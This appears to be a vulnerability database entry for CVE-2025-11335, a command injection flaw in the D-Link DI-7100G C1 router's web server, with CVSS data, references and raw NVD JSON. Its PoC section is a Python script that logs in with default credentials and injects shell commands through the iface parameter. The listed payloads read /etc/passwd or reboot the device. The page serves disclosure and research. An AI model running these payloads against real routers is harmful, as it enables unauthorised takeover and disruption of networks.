CVE-2025-11335

Description

A weakness has been identified in D-Link DI-7100G C1 up to 20250928. Affected by this vulnerability is the function sub_46409C of the file /msp_info.htm?flag=qos of the component jhttpd. This manipulation of the argument iface causes command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DI-7100G C1 固件版本 <= 20250928

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11335 PoC - D-Link DI-7100G C1 Command Injection
# Vulnerability: Command injection in sub_46409C via iface parameter
# Target: /msp_info.htm?flag=qos

import requests

TARGET_URL = "http://192.168.0.1"  # Replace with target router IP
USERNAME = "admin"  # Default credentials may vary
PASSWORD = "admin"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_URL}/login.htm"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

response = session.post(login_url, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Exploit command injection via iface parameter
# The iface parameter is passed directly to a system command without sanitization
vulnerable_endpoint = f"{TARGET_URL}/msp_info.htm?flag=qos"

# Payload: inject shell command after the legitimate iface value
# Using semicolon to terminate the original command and execute our own
payload = "eth0;id"  # Execute 'id' command

params = {
    "flag": "qos",
    "iface": payload
}

response = session.get(vulnerable_endpoint, params=params)
print(f"[*] Exploit response status: {response.status_code}")
print(f"[*] Response body:\n{response.text}")

# Additional payloads for demonstration:
# iface=eth0;cat /etc/passwd
# iface=eth0;uname -a
# iface=eth0;reboot
# iface=`id`
# iface=eth0$(id)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11335
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11335
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11335/
[4] VulDB https://vuldb.com/cve/CVE-2025-11335
[5] https://vuldb.com/?ctiid.327218
[6] https://vuldb.com/?id.327218
[7] https://vuldb.com/?submit.664597
[8] https://www.dlink.com/
[9] https://www.yuque.com/jh0ng/vmpda6/fpqlhpkb0orgseav
[10] https://www.yuque.com/jh0ng/vmpda6/fpqlhpkb0orgseav#DOhrV

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11335", "sourceIdentifier": "[email protected]", "published": "2025-10-06T13:15:33.100", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in D-Link DI-7100G C1 up to 20250928. Affected by this vulnerability is the function sub_46409C of the file /msp_info.htm?flag=qos of the component jhttpd. This manipulation of the argument iface causes command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:*", "matchCriteriaId": "7A967144-1055-4FC2-97F7-8E486F6D6D53"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B661C392-F07F-4BF5-B559-B00693C63E94"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327218", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327218", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664597", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/fpqlhpkb0orgseav", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/fpqlhpkb0orgseav#DOhrV", "source": "[email protected]", "tags": ["Permissions Required"]}]}}